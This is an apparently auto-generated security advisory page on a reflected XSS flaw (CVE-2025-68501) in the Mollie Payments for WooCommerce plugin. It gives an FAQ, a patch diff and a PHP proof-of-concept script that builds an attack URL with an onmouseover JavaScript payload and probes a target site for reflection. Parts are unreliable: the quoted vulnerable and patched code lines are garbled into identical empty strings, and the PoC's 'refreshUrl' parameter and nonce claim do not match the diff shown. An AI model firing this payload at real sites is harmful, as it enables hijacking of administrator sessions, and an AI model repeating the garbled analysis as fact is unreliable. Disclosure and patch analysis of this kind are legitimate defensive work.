What is CVE-2025-68501?

CVE-2025-68501 is a reflected cross-site scripting (XSS) vulnerability in the Mollie Payments for WooCommerce plugin for WordPress. It allows unauthenticated attackers to inject arbitrary web scripts into web pages viewed by users, particularly if they can trick a user into clicking a malicious link.

Which versions of the plugin are affected?

The vulnerability affects all versions of the Mollie Payments for WooCommerce plugin up to and including version 8.1.1. Users should check their installed version against this to determine if they are at risk.

How can I check if I am affected by this vulnerability?

To check if you are affected, navigate to the Plugins section in your WordPress admin dashboard. Look for the Mollie Payments for WooCommerce plugin and verify its version number; if it is 8.1.1 or lower, you are at risk.

How can I fix the vulnerability?

The vulnerability is fixed in version 8.1.2 of the Mollie Payments for WooCommerce plugin. It is recommended to update the plugin to this version or later as soon as possible to mitigate the risk.

What does the CVSS score of 6.1 indicate?

A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while it is not the most critical type of vulnerability, it still poses a significant risk, especially if exploited by an attacker against an authenticated user.

What is reflected cross-site scripting (XSS)?

Reflected cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web page that is then reflected back to the user. This typically happens through crafted URLs that execute the script when the user clicks the link.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can craft a malicious URL that includes a JavaScript payload in the ‘refreshUrl’ parameter. When an authenticated administrator clicks this link, the payload executes in their browser, demonstrating the vulnerability’s impact.

What steps can I take to mitigate the risk if I cannot update immediately?

If immediate updating is not possible, consider disabling the plugin until it can be updated. Additionally, monitor user activity and restrict access to the admin area to trusted users only.

Is there any additional information available about this vulnerability?

For more detailed information, you can refer to the official CVE database or the plugin’s changelog on the WordPress repository, which outlines the changes made in version 8.1.2.

What should I do if I suspect exploitation of this vulnerability?

If you suspect that the vulnerability has been exploited, conduct a thorough security audit of your site, check for unauthorized changes, and consider restoring from a backup. It may also be wise to consult with a security professional.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-68501: Mollie Payments for WooCommerce <= 8.1.1 – Reflected Cross-Site Scripting (mollie-payments-for-woocommerce)

CVE ID CVE-2025-68501

Plugin mollie-payments-for-woocommerce

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 8.1.1

Patched Version 8.1.2

Disclosed February 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68501:
This vulnerability is a reflected cross-site scripting (XSS) flaw in the Mollie Payments for WooCommerce WordPress plugin. The vulnerability affects versions up to and including 8.1.1. It allows unauthenticated attackers to inject arbitrary web scripts via a crafted link. The CVSS score of 6.1 indicates a medium severity issue.

The root cause is insufficient output escaping of a user-controlled URL parameter. The vulnerable code resides in the `refreshStatusField()` method within the `ConnectionStatusFields.php` file. In version 8.1.1, the function constructs a `$refreshUrl` by calling `add_query_arg()` with a nonce and a query parameter. This URL is then directly concatenated into an HTML anchor tag’s `href` attribute without proper escaping. The specific line of code is: `’value’ => ‘‘ . __(‘Refresh Mollie payment methods’, ‘mollie-payments-for-woocommerce’) . ‘‘`.

Exploitation requires an attacker to craft a malicious URL containing a JavaScript payload within the `refreshUrl` parameter. The attacker would trick an authenticated WordPress administrator into clicking a link that points to the plugin’s settings page. The payload would execute in the victim’s browser context when the page loads and the unescaped URL is rendered within the anchor tag. The attack vector is a reflected XSS via a GET request parameter.

The patch in version 8.1.2 addresses the vulnerability by applying the `esc_url()` WordPress escaping function to the `$refreshUrl` variable before output. The diff shows the change on line 16 of `ConnectionStatusFields.php`: `’value’ => ‘‘ . __(‘Refresh Mollie payment methods’, ‘mollie-payments-for-woocommerce’) . ‘‘`. This function sanitizes the URL for safe output in HTML attributes, neutralizing any embedded JavaScript.

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of an authenticated administrator’s session. This can lead to session hijacking, site defacement, or the creation of new administrative accounts. The impact is limited to the actions the victim user can perform, but given the target is likely an administrator, the consequences are severe.

Differential between vulnerable and patched code

Code Diff

--- a/mollie-payments-for-woocommerce/mollie-payments-for-woocommerce.php
+++ b/mollie-payments-for-woocommerce/mollie-payments-for-woocommerce.php
@@ -4,11 +4,11 @@
  * Plugin Name: Mollie Payments for WooCommerce
  * Plugin URI: https://www.mollie.com
  * Description: Accept payments in WooCommerce with the official Mollie plugin
- * Version: 8.1.1
+ * Version: 8.1.2
  * Author: Mollie
  * Author URI: https://www.mollie.com
  * Requires at least: 5.0
- * Tested up to: 6.8
+ * Tested up to: 6.9
  * Text Domain: mollie-payments-for-woocommerce
  * Domain Path: /languages
  * License: GPLv2 or later
--- a/mollie-payments-for-woocommerce/scoper.inc.php
+++ b/mollie-payments-for-woocommerce/scoper.inc.php
@@ -8,7 +8,7 @@
 $wp_classes = json_decode(file_get_contents(__DIR__ . '/vendor/sniccowp/php-scoper-wordpress-excludes/generated/exclude-wordpress-classes.json'), true);
 $wp_constants = json_decode(file_get_contents(__DIR__ . '/vendor/sniccowp/php-scoper-wordpress-excludes/generated/exclude-wordpress-constants.json'), true);
 $wp_functions = json_decode(file_get_contents(__DIR__ . '/vendor/sniccowp/php-scoper-wordpress-excludes/generated/exclude-wordpress-functions.json'), true);
-$finders = [Finder::create()->files()->ignoreVCS(true)->ignoreDotFiles(false)->exclude(['.github', '.ddev', '.idea', 'modules.local', 'tests'])->in('.')];
+$finders = [Finder::create()->files()->ignoreVCS(true)->ignoreDotFiles(false)->exclude(['.github', '.ddev', '.idea', 'modules.local', 'tests', 'node_modules'])->in('.')];
 return [
     'prefix' => 'Mollie',
     // string|null
--- a/mollie-payments-for-woocommerce/src/Buttons/ApplePayButton/ApplePayDirectHandler.php
+++ b/mollie-payments-for-woocommerce/src/Buttons/ApplePayButton/ApplePayDirectHandler.php
@@ -33,25 +33,31 @@
     public function bootstrap($buttonEnabledProduct, $buttonEnabledCart)
     {
         if (!$this->isApplePayCompatible()) {
-            $message = sprintf(
-                /* translators: Placeholder 1: Opening strong tag. Placeholder 2: Closing strong tag. Placeholder 3: Opening link tag to documentation. Placeholder 4: Closing link tag.*/
-                esc_html__('%1$sServer not compliant with Apple requirements%2$s Check %3$sApple Server requirements page%4$s to fix it in order to make the Apple Pay button work', 'mollie-payments-for-woocommerce'),
-                '<strong>',
-                '</strong>',
-                '<a href="https://developer.apple.com/documentation/apple_pay_on_the_web/setting_up_your_server">',
-                '</a>'
-            );
-            $this->adminNotice->addNotice('error', $message);
+            /* Defer translation until admin_notices (after init) */
+            add_action('admin_notices', function () {
+                $message = sprintf(
+                    /* translators: Placeholder 1: Opening strong tag. Placeholder 2: Closing strong tag. Placeholder 3: Opening link tag to documentation. Placeholder 4: Closing link tag.*/
+                    esc_html__('%1$sServer not compliant with Apple requirements%2$s Check %3$sApple Server requirements page%4$s to fix it in order to make the Apple Pay button work', 'mollie-payments-for-woocommerce'),
+                    '<strong>',
+                    '</strong>',
+                    '<a href="https://developer.apple.com/documentation/apple_pay_on_the_web/setting_up_your_server">',
+                    '</a>'
+                );
+                echo '<div class="notice notice-error"><p>' . wp_kses_post($message) . '</p></div>';
+            });
             return;
         }
         if (!$this->merchantValidated()) {
-            $message = sprintf(
-                /* translators: Placeholder 1: Opening link tag to documentation. Placeholder 2: Closing link tag.*/
-                esc_html__('Apple Pay Validation Error: Please review the %1$sApple Server requirements%2$s. If everything appears correct, click the Apple Pay button to retry validation.', 'mollie-payments-for-woocommerce'),
-                '<a href="https://developer.apple.com/documentation/apple_pay_on_the_web/setting_up_your_server" target="_blank">',
-                '</a>'
-            );
-            $this->adminNotice->addNotice('error', $message);
+            /* Defer translation until admin_notices (after init) */
+            add_action('admin_notices', function () {
+                $message = sprintf(
+                    /* translators: Placeholder 1: Opening link tag to documentation. Placeholder 2: Closing link tag.*/
+                    esc_html__('Apple Pay Validation Error: Please review the %1$sApple Server requirements%2$s. If everything appears correct, click the Apple Pay button to retry validation.', 'mollie-payments-for-woocommerce'),
+                    '<a href="https://developer.apple.com/documentation/apple_pay_on_the_web/setting_up_your_server" target="_blank">',
+                    '</a>'
+                );
+                echo '<div class="notice notice-error"><p>' . wp_kses_post($message) . '</p></div>';
+            });
         }
         if ($buttonEnabledProduct) {
             $renderPlaceholder = apply_filters('mollie_wc_gateway_applepay_render_hook_product', 'woocommerce_after_add_to_cart_form');
--- a/mollie-payments-for-woocommerce/src/Settings/Page/Section/ConnectionStatusFields.php
+++ b/mollie-payments-for-woocommerce/src/Settings/Page/Section/ConnectionStatusFields.php
@@ -13,7 +13,8 @@
     public function refreshStatusField(): array
     {
         $refreshNonce = wp_create_nonce('nonce_mollie_refresh_methods');
-        $refreshUrl = add_query_arg(['refresh-methods' => 1, 'nonce_mollie_refresh_methods' => $refreshNonce]);
-        return ['id' => $this->settings->getSettingId('refresh_status'), 'title' => __('Payment method availability', 'mollie-payments-for-woocommerce'), 'value' => '<a class="button-secondary" href="' . $refreshUrl . '">' . __('Refresh Mollie payment methods', 'mollie-payments-for-woocommerce') . '</a>', 'desc' => __('Click this button to refresh your payment methods, e.g. if you recently enabled new payment methods in your Mollie profile', 'mollie-payments-for-woocommerce'), 'type' => 'mollie_custom_input'];
+        $baseUrl = admin_url('/admin.php?page=wc-settings&tab=mollie_settings&section=mollie_payment_methods');
+        $refreshUrl = add_query_arg(['refresh-methods' => 1, 'nonce_mollie_refresh_methods' => $refreshNonce], $baseUrl);
+        return ['id' => $this->settings->getSettingId('refresh_status'), 'title' => __('Payment method availability', 'mollie-payments-for-woocommerce'), 'value' => '<a class="button-secondary" href="' . esc_url($refreshUrl) . '">' . __('Refresh Mollie payment methods', 'mollie-payments-for-woocommerce') . '</a>', 'desc' => __('Click this button to refresh your payment methods, e.g. if you recently enabled new payment methods in your Mollie profile', 'mollie-payments-for-woocommerce'), 'type' => 'mollie_custom_input'];
     }
 }
--- a/mollie-payments-for-woocommerce/src/Settings/Page/Section/InstructionsNotConnected.php
+++ b/mollie-payments-for-woocommerce/src/Settings/Page/Section/InstructionsNotConnected.php
@@ -31,7 +31,7 @@
         <ol>
             <li>
                 <?php
-        echo wp_kses(sprintf(__("Don’t have a Mollie account yet? <a href='%s' target='_blank'>Get started with Mollie today.</a>", 'mollie-payments-for-woocommerce'), apply_filters('mollie-payments-for-woocommerce_signup_url', 'https://my.mollie.com/dashboard/signup/')), ['a' => ['href' => [], 'target' => []]]);
+        echo wp_kses(sprintf(__("Don’t have a Mollie account yet? <a href='%s' target='_blank'>Get started with Mollie today.</a>", 'mollie-payments-for-woocommerce'), apply_filters('mollie-payments-for-woocommerce_signup_url', 'https://my.mollie.com/dashboard/signup?utm_campaign=GLO_Q4__Woo-Signup-tracker&utm_medium=referral&utm_source={woodashboard}&campaign_name=GLO_Q4__Woo-Signup-tracker')), ['a' => ['href' => [], 'target' => []]]);
         ?>
             </li>
             <li>
--- a/mollie-payments-for-woocommerce/src/Settings/SettingsModule.php
+++ b/mollie-payments-for-woocommerce/src/Settings/SettingsModule.php
@@ -110,14 +110,15 @@
             }
             return __('Don’t have a Mollie account yet? Create one now. Limited time only! Pay ZERO processing fees for your first month. <a href="%s" target="_blank">Get started with Mollie today.</a> ', 'mollie-payments-for-woocommerce');
         }, 10, 3);
-        add_filter('mollie-payments-for-woocommerce_signup_url', static function ($url) {
-            $dateNow = new DateTime();
-            $endDateCampaign = new DateTime('2025-12-10');
-            if ($endDateCampaign < $dateNow) {
-                return $url;
-            }
-            return 'https://my.mollie.com/dashboard/signup/campaign/woocommerce2025?utm_campaign=GLO_Q3__Co-Marketing-Campaign-WooCommerce&utm_medium=referral&utm_source=dashboard&utm_content=woo_mollie_dash&sf_campaign_id=701QD00000iR21IYAS&campaign_name=GLO_Q3__Co-Marketing-Campaign-WooCommerce';
-        });
+        /*add_filter('mollie-payments-for-woocommerce_signup_url', static function ($url) {
+                    $dateNow = new DateTime();
+                    $endDateCampaign = new DateTime('2026-01-01');
+                    if ($endDateCampaign < $dateNow) {
+                        return $url;
+                    }
+
+                    return 'https://my.mollie.com/dashboard/signup?utm_campaign=GLO_Q4__Woo-Signup-tracker&utm_medium=referral&utm_source={woodashboard}&campaign_name=GLO_Q4__Woo-Signup-tracker';
+                });*/
         //init settings with advanced and components defaults if not exists
         $optionName = $container->get('settings.option_name');
         $defaultAdvancedOptions = $container->get('settings.advanced_default_options');
--- a/mollie-payments-for-woocommerce/vendor/composer/autoload_static.php
+++ b/mollie-payments-for-woocommerce/vendor/composer/autoload_static.php
@@ -7,7 +7,7 @@
 class ComposerStaticInitbf0d59b326756ec3f097a186388c2955
 {
     public static $prefixLengthsPsr4 = array (
-        'M' =>
+        'M' =>
         array (
             'Mollie\WooCommerce\' => 19,
             'Mollie\Psr\Log\' => 15,
@@ -18,46 +18,46 @@
             'Mollie\Dhii\Services\' => 21,
             'Mollie\Api\' => 11,
         ),
-        'C' =>
+        'C' =>
         array (
             'Composer\CaBundle\' => 18,
         ),
     );

     public static $prefixDirsPsr4 = array (
-        'Mollie\WooCommerce\' =>
+        'Mollie\WooCommerce\' =>
         array (
             0 => __DIR__ . '/../..' . '/src',
         ),
-        'Mollie\Psr\Log\' =>
+        'Mollie\Psr\Log\' =>
         array (
             0 => __DIR__ . '/..' . '/psr/log/Psr/Log',
         ),
-        'Mollie\Psr\Container\' =>
+        'Mollie\Psr\Container\' =>
         array (
             0 => __DIR__ . '/..' . '/psr/container/src',
         ),
-        'Mollie\Inpsyde\PaymentGateway\' =>
+        'Mollie\Inpsyde\PaymentGateway\' =>
         array (
             0 => __DIR__ . '/../..' . '/lib/payment-gateway/src',
         ),
-        'Mollie\Inpsyde\Modularity\' =>
+        'Mollie\Inpsyde\Modularity\' =>
         array (
             0 => __DIR__ . '/..' . '/inpsyde/modularity/src',
         ),
-        'Mollie\Inpsyde\EnvironmentChecker\' =>
+        'Mollie\Inpsyde\EnvironmentChecker\' =>
         array (
             0 => __DIR__ . '/../..' . '/pluginEnvironmentChecker',
         ),
-        'Mollie\Dhii\Services\' =>
+        'Mollie\Dhii\Services\' =>
         array (
             0 => __DIR__ . '/..' . '/dhii/services/src',
         ),
-        'Mollie\Api\' =>
+        'Mollie\Api\' =>
         array (
             0 => __DIR__ . '/..' . '/mollie/mollie-api-php/src',
         ),
-        'Composer\CaBundle\' =>
+        'Composer\CaBundle\' =>
         array (
             0 => __DIR__ . '/..' . '/composer/ca-bundle/src',
         ),
--- a/mollie-payments-for-woocommerce/vendor/composer/installed.php
+++ b/mollie-payments-for-woocommerce/vendor/composer/installed.php
@@ -2,4 +2,4 @@

 namespace Mollie;

-return array('root' => array('name' => 'mollie/mollie-woocommerce', 'pretty_version' => 'dev-develop', 'version' => 'dev-develop', 'reference' => '4ff1716bf5cf77c3f2044498547739c5a9c5e22e', 'type' => 'wordpress-plugin', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => false), 'versions' => array('composer/ca-bundle' => array('pretty_version' => '1.5.7', 'version' => '1.5.7.0', 'reference' => 'd665d22c417056996c59019579f1967dfe5c1e82', 'type' => 'library', 'install_path' => __DIR__ . '/./ca-bundle', 'aliases' => array(), 'dev_requirement' => false), 'dhii/services' => array('pretty_version' => 'v0.1.0', 'version' => '0.1.0.0', 'reference' => '09cad8199a59d2003ad19126213075aefecaf17b', 'type' => 'library', 'install_path' => __DIR__ . '/../dhii/services', 'aliases' => array(), 'dev_requirement' => false), 'inpsyde/modularity' => array('pretty_version' => '1.12.0', 'version' => '1.12.0.0', 'reference' => 'e1ca1c81b7b663355906b586525d21ac5d46bc65', 'type' => 'library', 'install_path' => __DIR__ . '/../inpsyde/modularity', 'aliases' => array(), 'dev_requirement' => false), 'mollie/mollie-api-php' => array('pretty_version' => 'v2.79.1', 'version' => '2.79.1.0', 'reference' => '4c1cf5f603178dd15bdf60b5e3999f91bb59f5b0', 'type' => 'library', 'install_path' => __DIR__ . '/../mollie/mollie-api-php', 'aliases' => array(), 'dev_requirement' => false), 'mollie/mollie-woocommerce' => array('pretty_version' => 'dev-develop', 'version' => 'dev-develop', 'reference' => '4ff1716bf5cf77c3f2044498547739c5a9c5e22e', 'type' => 'wordpress-plugin', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'psr/container' => array('pretty_version' => '1.1.0', 'version' => '1.1.0.0', 'reference' => '9fc7aab7a78057a124384358ebae8a1711b6f6fc', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/container', 'aliases' => array(), 'dev_requirement' => false), 'psr/log' => array('pretty_version' => '1.1.4', 'version' => '1.1.4.0', 'reference' => 'd49695b909c3b7628b6289db5479a1c204601f11', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/log', 'aliases' => array(), 'dev_requirement' => false), 'sniccowp/php-scoper-wordpress-excludes' => array('pretty_version' => '6.8.1', 'version' => '6.8.1.0', 'reference' => 'c2c18f89a9aa2d7ef1998d233b9ed00d0deff5dd', 'type' => 'library', 'install_path' => __DIR__ . '/../sniccowp/php-scoper-wordpress-excludes', 'aliases' => array(), 'dev_requirement' => false)));
+return array('root' => array('name' => 'mollie/mollie-woocommerce', 'pretty_version' => 'dev-develop', 'version' => 'dev-develop', 'reference' => '0642fc2ff30b489fb16ee628f5a2eb6784ab83fb', 'type' => 'wordpress-plugin', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => false), 'versions' => array('composer/ca-bundle' => array('pretty_version' => '1.5.7', 'version' => '1.5.7.0', 'reference' => 'd665d22c417056996c59019579f1967dfe5c1e82', 'type' => 'library', 'install_path' => __DIR__ . '/./ca-bundle', 'aliases' => array(), 'dev_requirement' => false), 'dhii/services' => array('pretty_version' => 'v0.1.0', 'version' => '0.1.0.0', 'reference' => '09cad8199a59d2003ad19126213075aefecaf17b', 'type' => 'library', 'install_path' => __DIR__ . '/../dhii/services', 'aliases' => array(), 'dev_requirement' => false), 'inpsyde/modularity' => array('pretty_version' => '1.12.0', 'version' => '1.12.0.0', 'reference' => 'e1ca1c81b7b663355906b586525d21ac5d46bc65', 'type' => 'library', 'install_path' => __DIR__ . '/../inpsyde/modularity', 'aliases' => array(), 'dev_requirement' => false), 'mollie/mollie-api-php' => array('pretty_version' => 'v2.79.1', 'version' => '2.79.1.0', 'reference' => '4c1cf5f603178dd15bdf60b5e3999f91bb59f5b0', 'type' => 'library', 'install_path' => __DIR__ . '/../mollie/mollie-api-php', 'aliases' => array(), 'dev_requirement' => false), 'mollie/mollie-woocommerce' => array('pretty_version' => 'dev-develop', 'version' => 'dev-develop', 'reference' => '0642fc2ff30b489fb16ee628f5a2eb6784ab83fb', 'type' => 'wordpress-plugin', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'psr/container' => array('pretty_version' => '1.1.0', 'version' => '1.1.0.0', 'reference' => '9fc7aab7a78057a124384358ebae8a1711b6f6fc', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/container', 'aliases' => array(), 'dev_requirement' => false), 'psr/log' => array('pretty_version' => '1.1.4', 'version' => '1.1.4.0', 'reference' => 'd49695b909c3b7628b6289db5479a1c204601f11', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/log', 'aliases' => array(), 'dev_requirement' => false), 'sniccowp/php-scoper-wordpress-excludes' => array('pretty_version' => '6.8.1', 'version' => '6.8.1.0', 'reference' => 'c2c18f89a9aa2d7ef1998d233b9ed00d0deff5dd', 'type' => 'library', 'install_path' => __DIR__ . '/../sniccowp/php-scoper-wordpress-excludes', 'aliases' => array(), 'dev_requirement' => false)));

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68501 - Mollie Payments for WooCommerce <= 8.1.1 - Reflected Cross-Site Scripting
<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin.php';

// Craft the malicious payload. The payload is placed in the 'refreshUrl' parameter.
// The payload will close the href attribute and inject an event handler.
$payload = '" onmouseover="alert(document.domain)';

// Build the attack URL targeting the plugin's settings page.
// The page, tab, and section parameters navigate to the vulnerable component.
$attack_params = array(
    'page' => 'wc-settings',
    'tab' => 'mollie_settings',
    'section' => 'mollie_payment_methods',
    'refresh-methods' => '1',
    'nonce_mollie_refresh_methods' => 'any_value', // Nonce validation is not required for the XSS to trigger.
    'refreshUrl' => $payload // This parameter will be reflected unsanitized in version <= 8.1.1.
);

$attack_url = $target_url . '?' . http_build_query($attack_params);

echo "Crafted Attack URL:n";
echo $attack_url . "nn";
echo "Instructions:n";
echo "1. Ensure the target site uses Mollie Payments for WooCommerce <= 8.1.1.n";
echo "2. An attacker would send this URL to an authenticated administrator.n";
echo "3. When the admin visits the link and hovers over the 'Refresh Mollie payment methods' button, the JavaScript payload executes.n";

// Optional: Use cURL to fetch the page and verify the payload is present in the response (for demonstration).
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, $payload) !== false) {
    echo "n[+] Payload found in response. Site may be vulnerable.n";
} else {
    echo "n[-] Payload not found in response. Site may be patched or the request failed.n";
}

?>

Frequently Asked Questions

What is CVE-2025-68501?
Overview of the vulnerability
CVE-2025-68501 is a reflected cross-site scripting (XSS) vulnerability in the Mollie Payments for WooCommerce plugin for WordPress. It allows unauthenticated attackers to inject arbitrary web scripts into web pages viewed by users, particularly if they can trick a user into clicking a malicious link.
Which versions of the plugin are affected?
Identifying vulnerable versions
The vulnerability affects all versions of the Mollie Payments for WooCommerce plugin up to and including version 8.1.1. Users should check their installed version against this to determine if they are at risk.
How can I check if I am affected by this vulnerability?
Verifying your plugin version
To check if you are affected, navigate to the Plugins section in your WordPress admin dashboard. Look for the Mollie Payments for WooCommerce plugin and verify its version number; if it is 8.1.1 or lower, you are at risk.
How can I fix the vulnerability?
Updating the plugin
The vulnerability is fixed in version 8.1.2 of the Mollie Payments for WooCommerce plugin. It is recommended to update the plugin to this version or later as soon as possible to mitigate the risk.
What does the CVSS score of 6.1 indicate?
Understanding the severity rating
A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while it is not the most critical type of vulnerability, it still poses a significant risk, especially if exploited by an attacker against an authenticated user.
What are the practical risks of this vulnerability?
Potential impacts of exploitation
If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the context of an authenticated administrator’s session. This could lead to session hijacking, unauthorized actions on the site, or even site defacement.
What is reflected cross-site scripting (XSS)?
Explaining the attack vector
Reflected cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web page that is then reflected back to the user. This typically happens through crafted URLs that execute the script when the user clicks the link.
How does the proof of concept demonstrate the vulnerability?
Understanding the demonstration
The proof of concept shows how an attacker can craft a malicious URL that includes a JavaScript payload in the ‘refreshUrl’ parameter. When an authenticated administrator clicks this link, the payload executes in their browser, demonstrating the vulnerability’s impact.
What steps can I take to mitigate the risk if I cannot update immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the plugin until it can be updated. Additionally, monitor user activity and restrict access to the admin area to trusted users only.
Is there any additional information available about this vulnerability?
Resources for further reading
For more detailed information, you can refer to the official CVE database or the plugin’s changelog on the WordPress repository, which outlines the changes made in version 8.1.2.
What should I do if I suspect exploitation of this vulnerability?
Responding to potential attacks
If you suspect that the vulnerability has been exploited, conduct a thorough security audit of your site, check for unauthorized changes, and consider restoring from a backup. It may also be wise to consult with a security professional.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations